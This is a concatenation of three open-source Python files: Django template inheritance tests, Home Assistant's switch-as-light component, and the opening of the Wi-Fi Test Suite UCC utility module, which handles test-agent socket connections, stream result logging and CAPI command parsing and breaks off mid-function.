'inheritance42': "{% extends 'inheritance02'|cut:' ' %}",
}
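# Editor's note (added comment, not part of the original file): the templates above
# form small inheritance chains. For example 'inheritance02' extends 'inheritance01'
# and overrides both blocks, so it renders as '1234', while 'inheritance04' extends
# the same parent without overriding anything and renders the parent's defaults,
# '1&3_'. The test methods below assert exactly these outputs for each chain.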
class InheritanceTests(SimpleTestCase):
libraries = {'testtags': 'template_tests.templatetags.testtags'}
@setup(inheritance_templates)
def test_inheritance01(self):
"""
Standard template with no inheritance
"""
output = self.engine.render_to_string('inheritance01')
self.assertEqual(output, '1&3_')
@setup(inheritance_templates)
def test_inheritance02(self):
"""
Standard two-level inheritance
"""
output = self.engine.render_to_string('inheritance02')
self.assertEqual(output, '1234')
@setup(inheritance_templates)
def test_inheritance03(self):
"""
Three-level with no redefinitions on third level
"""
output = self.engine.render_to_string('inheritance03')
self.assertEqual(output, '1234')
@setup(inheritance_templates)
def test_inheritance04(self):
"""
Two-level with no redefinitions on second level
"""
output = self.engine.render_to_string('inheritance04')
self.assertEqual(output, '1&3_')
@setup(inheritance_templates)
def test_inheritance05(self):
"""
Two-level with double quotes instead of single quotes
"""
output = self.engine.render_to_string('inheritance05')
self.assertEqual(output, '1234')
@setup(inheritance_templates)
def test_inheritance06(self):
"""
Three-level with variable parent-template name
"""
output = self.engine.render_to_string('inheritance06', {'foo': 'inheritance02'})
self.assertEqual(output, '1234')
@setup(inheritance_templates)
def test_inheritance07(self):
"""
Two-level with one block defined, one block not defined
"""
output = self.engine.render_to_string('inheritance07')
self.assertEqual(output, '1&35')
@setup(inheritance_templates)
def test_inheritance08(self):
"""
Three-level with one block defined on this level, two blocks
defined next level
"""
output = self.engine.render_to_string('inheritance08')
self.assertEqual(output, '1235')
@setup(inheritance_templates)
def test_inheritance09(self):
"""
Three-level with second and third levels blank
"""
output = self.engine.render_to_string('inheritance09')
self.assertEqual(output, '1&3_')
@setup(inheritance_templates)
def test_inheritance10(self):
"""
Three-level with space NOT in a block -- should be ignored
"""
output = self.engine.render_to_string('inheritance10')
self.assertEqual(output, '1&3_')
@setup(inheritance_templates)
def test_inheritance11(self):
"""
Three-level with both blocks defined on this level, but none on
second level
"""
output = self.engine.render_to_string('inheritance11')
self.assertEqual(output, '1234')
@setup(inheritance_templates)
def test_inheritance12(self):
"""
Three-level with this level providing one and second level
providing the other
"""
output = self.engine.render_to_string('inheritance12')
self.assertEqual(output, '1235')
@setup(inheritance_templates)
def test_inheritance13(self):
"""
Three-level with this level overriding second level
"""
output = self.engine.render_to_string('inheritance13')
self.assertEqual(output, '1a3b')
@setup(inheritance_templates)
def test_inheritance14(self):
"""
A block defined only in a child template shouldn't be displayed
"""
output = self.engine.render_to_string('inheritance14')
self.assertEqual(output, '1&3_')
@setup(inheritance_templates)
def test_inheritance15(self):
"""
A block within another block
"""
output = self.engine.render_to_string('inheritance15')
self.assertEqual(output, '12inner3_')
@setup(inheritance_templates)
def test_inheritance16(self):
"""
A block within another block (level 2)
"""
output = self.engine.render_to_string('inheritance16')
self.assertEqual(output, '12out3_')
@setup(inheritance_templates)
def test_inheritance17(self):
"""
{% load %} tag (parent -- setup for exception04)
"""
output = self.engine.render_to_string('inheritance17')
self.assertEqual(output, '1234')
@setup(inheritance_templates)
def test_inheritance18(self):
"""
{% load %} tag (standard usage, without inheritance)
"""
output = self.engine.render_to_string('inheritance18')
self.assertEqual(output, 'this that theother5678')
@setup(inheritance_templates)
def test_inheritance19(self):
"""
{% load %} tag (within a child template)
"""
output = self.engine.render_to_string('inheritance19')
self.assertEqual(output, '140056783_')
@setup(inheritance_templates)
def test_inheritance20(self):
"""
Two-level inheritance with {{ block.super }}
"""
output = self.engine.render_to_string('inheritance20')
self.assertEqual(output, '1&a3_')
@setup(inheritance_templates)
def test_inheritance21(self):
"""
Three-level inheritance with {{ block.super }} from parent
"""
output = self.engine.render_to_string('inheritance21')
self.assertEqual(output, '12a34')
@setup(inheritance_templates)
def test_inheritance22(self):
"""
Three-level inheritance with {{ block.super }} from grandparent
"""
output = self.engine.render_to_string('inheritance22')
self.assertEqual(output, '1&a3_')
@setup(inheritance_templates)
def test_inheritance23(self):
"""
Three-level inheritance with {{ block.super }} from parent and
grandparent
"""
output = self.engine.render_to_string('inheritance23')
self.assertEqual(output, '1&ab3_')
@setup(inheritance_templates)
def test_inheritance24(self):
"""
Inheritance from local context without use of template loader
"""
context_template = self.engine.from_string("1{% block first %}_{% endblock %}3{% block second %}_{% endblock %}")
output = self.engine.render_to_string('inheritance24', {'context_template': context_template})
self.assertEqual(output, '1234')
@setup(inheritance_templates)
def test_inheritance25(self):
"""
Inheritance from local context with variable parent template
"""
context_template = [
self.engine.from_string("Wrong"),
self.engine.from_string("1{% block first %}_{% endblock %}3{% block second %}_{% endblock %}"),
]
output = self.engine.render_to_string('inheritance25', {'context_template': context_template})
self.assertEqual(output, '1234')
@setup(inheritance_templates)
def test_inheritance26(self):
"""
Set up a base template to extend
"""
output = self.engine.render_to_string('inheritance26')
self.assertEqual(output, 'no tags')
@setup(inheritance_templates)
def test_inheritance27(self):
"""
Inheritance from a template that doesn't have any blocks
"""
output = self.engine.render_to_string('inheritance27')
self.assertEqual(output, 'no tags')
@setup(inheritance_templates)
def test_inheritance_28(self):
"""
Set up a base template with a space in it.
"""
output = self.engine.render_to_string('inheritance 28')
self.assertEqual(output, '!')
@setup(inheritance_templates)
def test_inheritance29(self):
"""
Inheritance from a template with a space in its name should work.
"""
output = self.engine.render_to_string('inheritance29')
self.assertEqual(output, '!')
@setup(inheritance_templates)
def test_inheritance30(self):
"""
Base template, putting block in a conditional {% if %} tag
"""
output = self.engine.render_to_string('inheritance30', {'optional': True})
self.assertEqual(output, '123')
# Inherit from a template with block wrapped in an {% if %} tag
# (in parent), still gets overridden
@setup(inheritance_templates)
def test_inheritance31(self):
output = self.engine.render_to_string('inheritance31', {'optional': True})
self.assertEqual(output, '1two3')
@setup(inheritance_templates)
def test_inheritance32(self):
output = self.engine.render_to_string('inheritance32')
self.assertEqual(output, '13')
@setup(inheritance_templates)
def test_inheritance33(self):
"""
Base template, putting block in a conditional {% ifequal %} tag
"""
output = self.engine.render_to_string('inheritance33', {'optional': 1})
self.assertEqual(output, '123')
@setup(inheritance_templates)
def test_inheritance34(self):
"""
Inherit from a template with block wrapped in an {% ifequal %} tag
(in parent), still gets overridden
"""
output = self.engine.render_to_string('inheritance34', {'optional': 1})
self.assertEqual(output, '1two3')
@setup(inheritance_templates)
def test_inheritance35(self):
"""
Inherit from a template with block wrapped in an {% ifequal %} tag
(in parent), still gets overridden
"""
output = self.engine.render_to_string('inheritance35', {'optional': 2})
self.assertEqual(output, '13')
@setup(inheritance_templates)
def test_inheritance36(self):
"""
Base template, putting block in a {% for %} tag
"""
output = self.engine.render_to_string('inheritance36', {'numbers': '123'})
self.assertEqual(output, '_1_2_3_')
@setup(inheritance_templates)
def test_inheritance37(self):
"""
Inherit from a template with block wrapped in an {% for %} tag
(in parent), still gets overridden
"""
output = self.engine.render_to_string('inheritance37', {'numbers': '123'})
self.assertEqual(output, '_X_X_X_')
@setup(inheritance_templates)
def test_inheritance38(self):
"""
Inherit from a template with block wrapped in an {% for %} tag
(in parent), still gets overridden
"""
output = self.engine.render_to_string('inheritance38')
self.assertEqual(output, '_')
# The super block will still be found.
@setup(inheritance_templates)
def test_inheritance39(self):
output = self.engine.render_to_string('inheritance39', {'optional': True})
self.assertEqual(output, '1new23')
@setup(inheritance_templates)
def test_inheritance40(self):
output = self.engine.render_to_string('inheritance40', {'optional': 1})
self.assertEqual(output, '1new23')
@setup(inheritance_templates)
def test_inheritance41(self):
output = self.engine.render_to_string('inheritance41', {'numbers': '123'})
self.assertEqual(output, '_new1_new2_new3_')
@setup(inheritance_templates)
def test_inheritance42(self):
"""
Expression starting and ending with a quote
"""
output = self.engine.render_to_string('inheritance42')
self.assertEqual(output, '1234')
| bsd-3-clause |
leppa/home-assistant | homeassistant/components/switch/light.py | 3 | 4057 | """Light support for switch entities."""
import logging
from typing import Callable, Dict, Optional, Sequence, cast
import voluptuous as vol
from homeassistant.components import switch
from homeassistant.components.light import PLATFORM_SCHEMA, Light
from homeassistant.const import (
ATTR_ENTITY_ID,
CONF_ENTITY_ID,
CONF_NAME,
STATE_ON,
STATE_UNAVAILABLE,
)
from homeassistant.core import CALLBACK_TYPE, State, callback
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entity import Entity
from homeassistant.helpers.event import async_track_state_change
from homeassistant.helpers.typing import ConfigType, HomeAssistantType
# mypy: allow-untyped-calls, allow-untyped-defs, no-check-untyped-defs
_LOGGER = logging.getLogger(__name__)
DEFAULT_NAME = "Light Switch"
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Required(CONF_ENTITY_ID): cv.entity_domain(switch.DOMAIN),
}
)
async def async_setup_platform(
hass: HomeAssistantType,
config: ConfigType,
async_add_entities: Callable[[Sequence[Entity], bool], None],
discovery_info: Optional[Dict] = None,
) -> None:
"""Initialize Light Switch platform."""
async_add_entities(
[LightSwitch(cast(str, config.get(CONF_NAME)), config[CONF_ENTITY_ID])], True
)
class LightSwitch(Light):
"""Represents a Switch as a Light."""
def __init__(self, name: str, switch_entity_id: str) -> None:
"""Initialize Light Switch."""
self._name = name
self._switch_entity_id = switch_entity_id
self._is_on = False
self._available = False
self._async_unsub_state_changed: Optional[CALLBACK_TYPE] = None
@property
def name(self) -> str:
"""Return the name of the entity."""
return self._name
@property
def is_on(self) -> bool:
"""Return true if light switch is on."""
return self._is_on
@property
    def available(self) -> bool:
        """Return true if the underlying switch entity is available."""
return self._available
@property
def should_poll(self) -> bool:
"""No polling needed for a light switch."""
return False
async def async_turn_on(self, **kwargs):
"""Forward the turn_on command to the switch in this light switch."""
data = {ATTR_ENTITY_ID: self._switch_entity_id}
await self.hass.services.async_call(
switch.DOMAIN, switch.SERVICE_TURN_ON, data, blocking=True
)
async def async_turn_off(self, **kwargs):
"""Forward the turn_off command to the switch in this light switch."""
data = {ATTR_ENTITY_ID: self._switch_entity_id}
await self.hass.services.async_call(
switch.DOMAIN, switch.SERVICE_TURN_OFF, data, blocking=True
)
async def async_update(self):
"""Query the switch in this light switch and determine the state."""
switch_state = self.hass.states.get(self._switch_entity_id)
if switch_state is None:
self._available = False
return
self._is_on = switch_state.state == STATE_ON
self._available = switch_state.state != STATE_UNAVAILABLE
async def async_added_to_hass(self) -> None:
"""Register callbacks."""
@callback
def async_state_changed_listener(
entity_id: str, old_state: State, new_state: State
) -> None:
"""Handle child updates."""
self.async_schedule_update_ha_state(True)
assert self.hass is not None
self._async_unsub_state_changed = async_track_state_change(
self.hass, self._switch_entity_id, async_state_changed_listener
)
async def async_will_remove_from_hass(self):
"""Handle removal from Home Assistant."""
if self._async_unsub_state_changed is not None:
self._async_unsub_state_changed()
self._async_unsub_state_changed = None
self._available = False
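# Example configuration (an illustrative sketch based on PLATFORM_SCHEMA above, not
# taken from the original file); the entity id and name are placeholders:
#
#   light:
#     - platform: switch
#       name: Desk Lamp
#       entity_id: switch.desk_outlet
#
# entity_id must belong to the switch domain; name falls back to "Light Switch"
# (DEFAULT_NAME) when omitted.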
| apache-2.0 |
jackalchen/Wi-FiTestSuite-UCC | python/Result-Processing-myutils.py | 4 | 59903 | ###################################################################
#
# Copyright (c) 2014 Wi-Fi Alliance
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY
# SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER
# RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT,
# NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE
# USE OR PERFORMANCE OF THIS SOFTWARE.
#
###################################################################
from socket import *
from time import gmtime, strftime
import thread, time, Queue, os
import sys, time
from select import select
import logging
import re
import ctypes
import HTML
from xml.dom.minidom import Document
from XMLLogger import XMLLogger
VERSION = "4.2.0"
conntable = {}
retValueTable = {}
DisplayNameTable = {}
streamSendResultArray = []
streamRecvResultArray = []
streamInfoArray = []
runningPhase = '1'
testRunning = 0
threadCount = 0
resultPrinted = 0
ifcondBit = 1
iDNB = 0
iINV = 0
RTPCount = 1
#default command file path
uccPath = '..\\..\\cmds'
DUTFeatureInfoFile = "./log/DUTFeatureInfo.html"
STD_INPUT_HANDLE = -10
STD_OUTPUT_HANDLE = -11
STD_ERROR_HANDLE = -12
FOREGROUND_BLUE = 0x01 # text color contains blue.
FOREGROUND_GREEN = 0x02 # text color contains green.
FOREGROUND_RED = 0x04 # text color contains red.
FOREGROUND_INTENSITY = 0x08 # text color is intensified.
#Define extra colours
FOREGROUND_WHITE = FOREGROUND_RED | FOREGROUND_BLUE | FOREGROUND_GREEN
FOREGROUND_YELLOW = FOREGROUND_RED | FOREGROUND_GREEN
FOREGROUND_CYAN = FOREGROUND_BLUE | FOREGROUND_GREEN
FOREGROUND_MAGENTA = FOREGROUND_RED | FOREGROUND_BLUE
BACKGROUND_BLUE = 0x10 # background color contains blue.
BACKGROUND_GREEN = 0x20 # background color contains green.
BACKGROUND_RED = 0x40 # background color contains red.
BACKGROUND_INTENSITY = 0x80 # background color is intensified.
std_out_handle = ctypes.windll.kernel32.GetStdHandle(STD_OUTPUT_HANDLE)
cSLog = ""
class classifiedLogs:
"""Global Handler for classified Logs"""
def __init__(self, name, fileName, msg=""):
self.name = name
self.fileD = open(fileName, 'a')
self.msg = msg
self.fileD.write("%s\n" % msg)
#time.strftime("%H-%M-%S_%b-%d-%y", time.localtime())
def log(self, msg):
"""Print out time and message into file"""
self.fileD.write("%s | %s \n" %(time.strftime("%b:%d:%Y-%H:%M:%S",
time.localtime()), msg))
def __str__(self):
return "%s:%s" %(self.fileName, self.msg)
def __del__(self):
self.fileD.close()
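# Illustrative usage (added comment, not part of the original module) -- a
# classifiedLogs instance appends one timestamped line per call, e.g.:
#
#   sniffer_log = classifiedLogs("SNIFFER", "./log/sniffer.log", "session start")
#   sniffer_log.log("sniffer_control_start received")
#   # -> "Jan:01:2020-12:00:00 | sniffer_control_start received" appended to the file
#
# The file name above is hypothetical; the script assigns its real instance to the
# global cSLog during initialization.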
class streamInfo:
    """Holds per-stream metadata (IDs, direction, traffic class) and formats it for logging"""
def __init__(self, streamID, IPAddress, pairID, direction,
trafficClass, frameRate, phase, RTPID):
self.streamID = streamID
self.IPAddress = IPAddress
self.pairID = pairID
self.direction = direction
self.trafficClass = trafficClass
self.frameRate = frameRate
self.phase = phase
self.status = -1
self.RTPID = RTPID
def __str__(self):
return "%-10s Stream ID = %s , IP Address = %s \n\r%-10s pairID = %s direction = %s \n\r%-10s frameRate =%s \n\r%-10s status =%s %s" % (' ', self.streamID, self.IPAddress, ' ', self.pairID, self.direction, ' ', self.frameRate, ' ', self.status, self.phase)
class streamResult:
    """Holds per-stream frame and byte counters and formats them for logging"""
def __init__(self, streamID, IPAddress, rxFrames, txFrames, rxBytes,
txBytes, phase):
self.streamID = streamID
self.IPAddress = IPAddress
self.rxFrames = rxFrames
self.txFrames = txFrames
self.rxBytes = rxBytes
self.txBytes = txBytes
self.phase = phase
#print 'self = %s streamID =%s' % (self,streamID)
def __str__(self):
return "%-10s RX %10s Bytes | TX %10s | Stream ID = %s" % (' ', self.rxBytes, self.txBytes, self.streamID)
# socket desc list to be used by select
waitsocks, readsocks, writesocks = [], [], []
#Multicast test
multicast = 0
def set_color(color, handle=std_out_handle):
"""(color) -> BOOL
Example: set_color(FOREGROUND_GREEN | FOREGROUND_INTENSITY)
"""
bool = ctypes.windll.kernel32.SetConsoleTextAttribute(handle, color)
return bool
def setUCCPath(path):
"""Set absolute path of cmds or script location"""
global uccPath
uccPath = path
return
def scanner(fileobject, linehandler):
"""Scan file objects"""
for line in fileobject.readlines():
if not line: break
linehandler(line)
def sock_tcp_conn(ipaddr, ipport):
    """Opens a blocking TCP client connection and registers it with the select() lists"""
global readsocks, waitsocks, deftimeout
buf = 2048
addr = (ipaddr, ipport)
mysock = socket(AF_INET, SOCK_STREAM)
try:
mysock.connect(addr)
except:
exc_info = sys.exc_info()
logging.error('Connection Error, IP = %s PORT = %s REASON = %s',
ipaddr, ipport, exc_info[1])
wfa_sys_exit("IP-%s:%s REASON = %s" % (ipaddr, ipport, exc_info[1]))
readsocks.append(mysock)
# Add the descriptor to select wait
waitsocks.append(mysock)
return mysock
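# Added note: each successful connection is tracked in two places -- the socket is
# appended to readsocks/waitsocks so responseWaitThreadFunc can select() on it, and
# process_ipadd() below also stores it in conntable keyed by the "ip:port" string so
# later CAPI commands can look the socket up by address.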
def process_ipadd(line):
    """Parses IP address/port pairs and opens a socket connection for each one not already connected."""
global conntable
i = 0
addrlist = []
addrlist = line.split(':')
naddr = len(addrlist)
while i < naddr:
ip = addrlist[i].split(',', 1)
ipa = ip[0].split('=')[1] # ip adress
ipp = ip[1].split('=')[1] # ip port
logging.info('Connecting to - IP Addr = %s Port = %s', ipa, ipp)
sockhdlr = sock_tcp_conn(ipa, int(ipp))
conntable["%s:%s" %(ipa, ipp)] = sockhdlr
i = i+1
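# Example (inferred from the parsing above, not taken from the original sources): a
# line describing two control agents would look like
#
#   ipaddr=192.168.250.40,ipport=9000:ipaddr=192.168.250.20,ipport=9000
#
# Each colon-separated entry yields an address/port pair, a TCP connection is opened
# for it, and the socket is stored in conntable under a key such as
# "192.168.250.40:9000". The key names before '=' and the addresses shown are
# illustrative placeholders.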
def close_conn():
global conntable
def printStreamResults():
    """Determines whether the run is WMM or WPA2 before printing stream results"""
global resultPrinted
ProgName = os.getenv("PROG_NAME")
if resultPrinted == 1:
return
XLogger.setTestResult("COMPLETED")
if ProgName == "P2P":
return
if "WPA2Test" in retValueTable:
logging.debug("WPA2 Results")
printStreamResults_WPA2()
else:
printStreamResults_WMM()
def printStreamResults_WPA2():
"""Prints stream results of WPA2"""
global resultPrinted
maxRTP = 1
set_color(FOREGROUND_WHITE)
if not streamSendResultArray:
resultPrinted = 0
else:
resultPrinted = 1
logging.info("\n\r %-7s --------------------STREAM RESULTS-----------------------" % "")
for s in streamSendResultArray:
sDisplayAddress = s.IPAddress
if s.IPAddress in DisplayNameTable:
sDisplayAddress = DisplayNameTable[s.IPAddress]
for r in streamInfoArray:
if r.streamID == s.streamID and r.IPAddress == s.IPAddress and r.phase == s.phase:
recv_id = r.pairID
trafficClass = r.trafficClass
phase = r.phase
break
for p in streamRecvResultArray:
pDisplayAddress = p.IPAddress
if p.IPAddress in DisplayNameTable:
pDisplayAddress = DisplayNameTable[p.IPAddress]
if p.streamID == recv_id and p.phase == s.phase:
logging.info("\n\r %-7s ----- %s --> %s -----" %
("", sDisplayAddress, pDisplayAddress))
logging.info("\n%s" % s)
if maxRTP < int(r.RTPID):
maxRTP = int(r.RTPID)
logging.info("\n%s" % p)
break
set_color(FOREGROUND_WHITE)
def printStreamResults_WMM():
"""Prints stream results of WMM"""
global resultPrinted
summaryList = {}
summaryStreamDisplay = {}
maxRTP = 1
i = 1
if not streamSendResultArray:
resultPrinted = 0
else:
resultPrinted = 1
logging.info("\n\r %-7s --------------------STREAM RESULTS-----------------------" % "")
for s in streamSendResultArray:
sDisplayAddress = s.IPAddress
if s.IPAddress in DisplayNameTable:
sDisplayAddress = DisplayNameTable[s.IPAddress]
for r in streamInfoArray:
if r.streamID == s.streamID and r.IPAddress == s.IPAddress and r.phase == s.phase:
recv_id = r.pairID
trafficClass = r.trafficClass
phase = r.phase
break
for p in streamRecvResultArray:
pDisplayAddress = p.IPAddress
if p.IPAddress in DisplayNameTable:
pDisplayAddress = DisplayNameTable[p.IPAddress]
if p.streamID == recv_id and p.phase == s.phase:
logging.info("\n\r %-7s ----- RTP_%s-%s ( %s --> %s ) PHASE = %s -----" %("", r.RTPID, trafficClass, sDisplayAddress, pDisplayAddress, phase))
logging.info("\n%s" % s)
summaryList.setdefault("%s:%s"%(int(r.RTPID), int(phase)), p.rxBytes)
summaryStreamDisplay.setdefault("%s:%s" % (int(r.RTPID), int(phase)), "RTP%-1s_%-10s [%s-->%s]" % (r.RTPID, trafficClass, sDisplayAddress, pDisplayAddress))
if maxRTP < int(r.RTPID):
maxRTP = int(r.RTPID)
logging.info("\n%s" % p)
break
set_color(FOREGROUND_WHITE)
logging.info("--------------------------SUMMARY----------------------------------")
logging.info(" %46s %10s | %10s" % ("|", "Phase1 (Bytes)", "Phase2 (Bytes)"))
logging.info("-------------------------------------------------------------------")
while i <= maxRTP:
str1 = ""
str2 = ""
stremDisplay = ""
if "%s:%s"%(i, "1") in summaryList:
str1 = summaryList["%s:%s" % (i, "1")]
stremDisplay = summaryStreamDisplay["%s:%s"%(i, "1")]
if "%s:%s"%(i, "2") in summaryList:
str2 = summaryList["%s:%s" % (i, "2")]
stremDisplay = summaryStreamDisplay["%s:%s"%(i, "2")]
logging.info("\n%6s %-43s %5s %10s | %10s" % (" ", stremDisplay, "|", str1, str2))
i = i + 1
set_color(FOREGROUND_INTENSITY)
def responseWaitThreadFunc(_threadID, command, addr, receiverStream):
global waitsocks, readsocks, writesocks, runningPhase, testRunning, streamInfoArray
logging.debug("responseWaitThreadFunc started %s" % testRunning)
while testRunning > 0:
readables, writeables, exceptions = select(readsocks, writesocks, [], 0.1)
for sockobj in readables:
if sockobj in waitsocks:
resp = sockobj.recv(2048)
resp_arr = resp.split(',')
for socks in conntable:
if sockobj == conntable[socks]:
responseIPAddress = socks
displayaddr = responseIPAddress
if responseIPAddress in DisplayNameTable:
displayaddr = DisplayNameTable[responseIPAddress]
logging.info("%-15s <--1 %s" % (displayaddr, resp))
# Check for send stream completion
if len(resp_arr) > 2:
if resp_arr[3] == '':
logging.error("NULL streamID returned from %s" % responseIPAddress)
continue
if resp_arr[2] == 'streamID':
logging.debug("STREAM COMPLETED = %s" % (resp_arr[3]))
# spliting the values of multiple streams
idx = resp_arr[3].strip()
idx = idx.split(' ')
sCounter = 0 # For multiple stream value returns
if resp_arr[7].split(' ')[sCounter] == '':
sCounter = 1
for i in idx:
txFrames = resp_arr[5].split(' ')[sCounter]
logging.debug(" TXFRAMES = %s" % txFrames)
i = ("%s;%s"%(i, responseIPAddress))
if txFrames != '0':
logging.info("%s (%-15s) <-- SEND Stream - %s Completed " % (displayaddr, responseIPAddress, i))
# Setting status complete
for p in streamInfoArray:
if p.IPAddress == responseIPAddress and p.streamID == i and p.phase == runningPhase:
p.status = 1
streamSendResultArray.append(streamResult(i, responseIPAddress, resp_arr[7].split(' ')[sCounter], resp_arr[5].split(' ')[sCounter], resp_arr[11].split(' ')[sCounter], resp_arr[9].split(' ')[sCounter], runningPhase))
else:
streamRecvResultArray.append(streamResult(i, responseIPAddress, resp_arr[7].split(' ')[sCounter], resp_arr[5].split(' ')[sCounter], resp_arr[11].split(' ')[sCounter], resp_arr[9].split(' ')[sCounter], runningPhase))
logging.info("%s (%-15s) <---- RECV Stream - %s Completed " % (displayaddr, responseIPAddress, i))
sCounter += 1
else:
logging.debug('Unwanted data on socket')
logging.debug("\n THREAD STOPPED ")
return
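# Added summary comment: responseWaitThreadFunc runs on a worker thread while
# testRunning is set. It select()s across every control-agent socket; whenever a
# response carries a 'streamID' field it records the per-stream frame/byte counters
# into streamSendResultArray or streamRecvResultArray for the current phase and marks
# the matching streamInfo entry complete so traffic_agent_receive_stop can stop
# waiting on it.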
def process_cmd(line):
"""
Process CAPI commands and send through socket if necessary
Parameters
----------
line : str
CAPI command followed by parameters with "," as delimiter
Returns
-------
none
Examples
--------
process_cmd(ca_get_version)
process_cmd(sniffer_control_filter_capture,infile,_521-step1,
outfile,521-step1_A,srcmac,00:11:22:33:44:55,
destmac,55:44:33:22:11:00)
"""
global conntable, threadCount, waitsocks_par, runningPhase, testRunning, streamInfoArray, resultPrinted
global retValueTable, RTPCount, multicast, ifcondBit, iDNB, iINV, ifCondBit, socktimeout
line = line.rstrip()
str = line.split('#')
recv_id = {}
try:
if str[0] == '':
return
command = str[0].split('!')
if command[0].lower() == "else":
if int(ifCondBit):
ifCondBit = 0
else:
ifCondBit = 1
return
if command[0].lower() == "endif":
ifCondBit = 1
return
if command[0].lower() == "if":
if command[1] in retValueTable:
command[1] = retValueTable[command[1]]
if command[3] in retValueTable:
command[3] = retValueTable[command[3]]
if(command[2]).lower() == "=":
if (command[1]).lower() == (command[3]).lower():
ifcondBit = 1
else:
ifcondBit = 0
elif (command[2]).lower() == ">":
if long(command[1]) > long(command[3]):
ifcondBit = 1
else:
ifcondBit = 0
elif (command[2]).lower() == "<":
if long(command[1]) < long(command[3]):
ifcondBit = 1
else:
ifcondBit = 0
elif (command[2]).lower() == ">=":
if long(command[1]) >= long(command[3]):
ifcondBit = 1
else:
ifcondBit = 0
elif (command[2]).lower() == "<=":
if long(command[1]) <= long(command[3]):
ifcondBit = 1
else:
ifcondBit = 0
elif (command[2]).lower() == "<>":
if (command[1]).lower() != (command[3]).lower():
ifcondBit = 1
else:
ifcondBit = 0
return
if int(ifcondBit) == 0:
return
if command[0].lower() == "_dnb_":
iDNB = 1
return
if command[0].lower() == "_inv":
iINV = 1
return
if command[0].lower() == "inv_":
iINV = 0
return
if command[0].lower() == "mexpr":
if command[1] not in retValueTable:
return
if command[3] in retValueTable:
command[3] = retValueTable[command[3]]
if command[2] == "%":
retValueTable[command[1]] = (int(retValueTable[command[1]]) * int(command[3])) / 100
return
if command[0].lower() == "extract_p2p_ssid":
if command[1] in retValueTable:
command[1] = retValueTable[command[1]]
p2p_ssid = command[1].split(' ')
if len(p2p_ssid) > 1:
retValueTable.setdefault("$P2P_SSID", "%s" % p2p_ssid[1])
else:
logging.error("Invalid P2P Group ID")
return
if command[0].lower() == "calculate_ext_listen_values":
if command[1] not in retValueTable or command[2] not in retValueTable:
wfa_sys_exit("%s or %s not available" % (command[1], command[2]))
command[1] = retValueTable[command[1]]
command[2] = retValueTable[command[2]]
retValueTable.setdefault("$PROBE_REQ_INTERVAL", "%s" % (int(command[2]) / 2))
retValueTable.setdefault("$PROBE_REQ_COUNT", "%s" % (int(command[1]) / (int(command[2]) / 2)))
return
if command[0].lower() == "get_rnd_ip_address":
if command[1] in retValueTable:
command[1] = retValueTable[command[1]]
if command[2] in retValueTable:
command[2] = retValueTable[command[2]]
ip1 = command[1].split(".")
ip2 = command[2].split(".")
if (int(ip2[3]) + 1) != int(ip1[3]):
rnd_ip = ("%s.%s.%s.%s" % (ip2[0], ip2[1], ip2[2], int(ip2[3]) + 1))
else:
rnd_ip = ("%s.%s.%s.%s" % (ip2[0], ip2[1], ip2[2], int(ip2[3]) + 2))
retValueTable.setdefault(command[3], "%s" % rnd_ip)
return
if command[0].lower() == 'ucc_form_device_discovery_frame':
iCn = 0
for c in command:
if iCn > 1 and c in command:
wfa_sys_exit("Invalid UCC command")
#command[1] Frame command[2] GOUT Device Address command[3] group ID command[4] Injector source Address command[5] Testbed Client address
f = command[1].split('*')
iCn = 0
#Hex SSID
SSID = retValueTable[command[3]].split(" ")[1]
SSIDLength = len(SSID)
SSIDLen1 = hex(int(SSIDLength) + 22).split("0x")[1]
SSIDLen2 = "%s 00" % hex(int(SSIDLength + 6)).split("0x")[1]
if int(len(SSIDLen2)) < 5:
SSIDLen2 = "0%s" % SSIDLen2
hexSSID = ""
for s in SSID:
h = hex(ord(s)).split("0x")[1]
hexSSID = hexSSID + h
logging.debug("hexSSID = %s hexLength %s" % (hexSSID, SSIDLength))
FrameData = "%s%s%s%s%s%s%s%s%s%s%s%s" % (f[0],
retValueTable[command[2]],
retValueTable[command[4]],
retValueTable[command[2]],
f[3],
SSIDLen1,
f[4],
retValueTable[command[5]],
f[5],
SSIDLen2,
retValueTable[command[2]],
hexSSID)
logging.debug(FrameData)
retValueTable.setdefault("$INJECT_FRAME_DATA", FrameData)
if command[0].lower() == 'addstaversioninfo':
vInfo = command[1].split(",")
i = 0
if len(vInfo) < 5:
logging.info("Incorrect version format")
return
if vInfo[0] not in retValueTable:
logging.debug("Unknown Component[1] %s", vInfo[0])
return
if retValueTable[vInfo[0]] not in conntable:
if retValueTable[retValueTable[vInfo[0]]] not in conntable:
logging.debug("Unknown Component[3] %s", vInfo[0])
return
#print vInfo
print len(retValueTable)
for c in vInfo:
if c in retValueTable:
vInfo[i] = retValueTable[c]
if vInfo[i] in DisplayNameTable:
vInfo[i] = DisplayNameTable[vInfo[i]]
i = i + 1
XLogger.AddTestbedDevice(vInfo[1], vInfo[2], vInfo[3], vInfo[4])
logging.debug(vInfo)
return
if command[0].lower() == 'adduccscriptversion':
XLogger.AddWTSComponent("UCC", VERSION, command[1])
if command[0].lower() == 'addwtscompversioninfo' or command[0].lower() == 'adddutversioninfo':
vInfo = command[1].split(",")
i = 0
if len(vInfo) < 5:
logging.info("Incorrect version format...")
return
if vInfo[0] in retValueTable:
vInfo[0] = retValueTable[vInfo[0]]
#print vInfo
print len(retValueTable)
for c in vInfo:
if c in retValueTable:
vInfo[i] = retValueTable[c]
if vInfo[i] in DisplayNameTable:
vInfo[i] = DisplayNameTable[vInfo[i]]
i = i + 1
if command[0].lower() == 'adddutversioninfo':
XLogger.AddDUTInfo(vInfo[1], vInfo[2], vInfo[3], vInfo[4])
logging.debug("DUT INFO [%s][%s][%s][%s]" % (vInfo[1], vInfo[2], vInfo[3], vInfo[4]))
